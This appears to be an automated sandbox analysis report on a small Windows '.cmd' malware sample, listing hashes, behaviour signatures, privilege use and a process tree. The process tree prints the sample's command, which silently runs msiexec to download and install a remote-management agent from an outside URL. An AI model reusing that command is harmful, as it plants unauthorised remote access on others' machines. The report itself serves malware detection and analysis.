Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
02-12-2024 17:14
Static task
static1
Behavioral task
behavioral1
Sample
.cmd
Resource
win7-20241023-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
.cmd
Resource
win10v2004-20241007-en
windows10-2004-x64
24 signatures
150 seconds
General
-
Target
.cmd
-
Size
243B
-
MD5
c4bf62cf6cc80eac0f69164f01d1f5ee
-
SHA1
8d2a2748387d76924429b3fd35bca6ae2fca4507
-
SHA256
eb4e2f8d3d2a735a325c6510ba0f814ca4652dede7b62ee342ec6f0b0c00b04b
-
SHA512
92f06f6491347827e90eb36b1c424b20e19de1d460d45ac1313b4bdbdabb0aec9ba8983ff0a4a4efdbc34a9bcb52f58c15923ad7fbeda228aa8cef180512d87d
Score
7/10
Malware Config
Signatures
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid Process 2468 msiexec.exe -
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exeflow pid Process 5 2616 msiexec.exe 6 2616 msiexec.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
msiexec.exepid Process 2468 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
msiexec.exemsiexec.exedescription pid Process Token: SeShutdownPrivilege 2468 msiexec.exe Token: SeIncreaseQuotaPrivilege 2468 msiexec.exe Token: SeRestorePrivilege 2616 msiexec.exe Token: SeTakeOwnershipPrivilege 2616 msiexec.exe Token: SeSecurityPrivilege 2616 msiexec.exe Token: SeCreateTokenPrivilege 2468 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2468 msiexec.exe Token: SeLockMemoryPrivilege 2468 msiexec.exe Token: SeIncreaseQuotaPrivilege 2468 msiexec.exe Token: SeMachineAccountPrivilege 2468 msiexec.exe Token: SeTcbPrivilege 2468 msiexec.exe Token: SeSecurityPrivilege 2468 msiexec.exe Token: SeTakeOwnershipPrivilege 2468 msiexec.exe Token: SeLoadDriverPrivilege 2468 msiexec.exe Token: SeSystemProfilePrivilege 2468 msiexec.exe Token: SeSystemtimePrivilege 2468 msiexec.exe Token: SeProfSingleProcessPrivilege 2468 msiexec.exe Token: SeIncBasePriorityPrivilege 2468 msiexec.exe Token: SeCreatePagefilePrivilege 2468 msiexec.exe Token: SeCreatePermanentPrivilege 2468 msiexec.exe Token: SeBackupPrivilege 2468 msiexec.exe Token: SeRestorePrivilege 2468 msiexec.exe Token: SeShutdownPrivilege 2468 msiexec.exe Token: SeDebugPrivilege 2468 msiexec.exe Token: SeAuditPrivilege 2468 msiexec.exe Token: SeSystemEnvironmentPrivilege 2468 msiexec.exe Token: SeChangeNotifyPrivilege 2468 msiexec.exe Token: SeRemoteShutdownPrivilege 2468 msiexec.exe Token: SeUndockPrivilege 2468 msiexec.exe Token: SeSyncAgentPrivilege 2468 msiexec.exe Token: SeEnableDelegationPrivilege 2468 msiexec.exe Token: SeManageVolumePrivilege 2468 msiexec.exe Token: SeImpersonatePrivilege 2468 msiexec.exe Token: SeCreateGlobalPrivilege 2468 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 684 wrote to memory of 2468 684 cmd.exe 31 PID 684 wrote to memory of 2468 684 cmd.exe 31 PID 684 wrote to memory of 2468 684 cmd.exe 31 PID 684 wrote to memory of 2468 684 cmd.exe 31 PID 684 wrote to memory of 2468 684 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\system32\msiexec.exemsiexec /i "https://youreal.servicedesk.atera.com/GetAgent/Msi/?customerId=5&[email protected]&customerName=LL2&accountId=001Q3000003TcZeIAK" /qn [email protected] CompanyId=2 AccountId=001Q300000LYyQnIAL2⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2616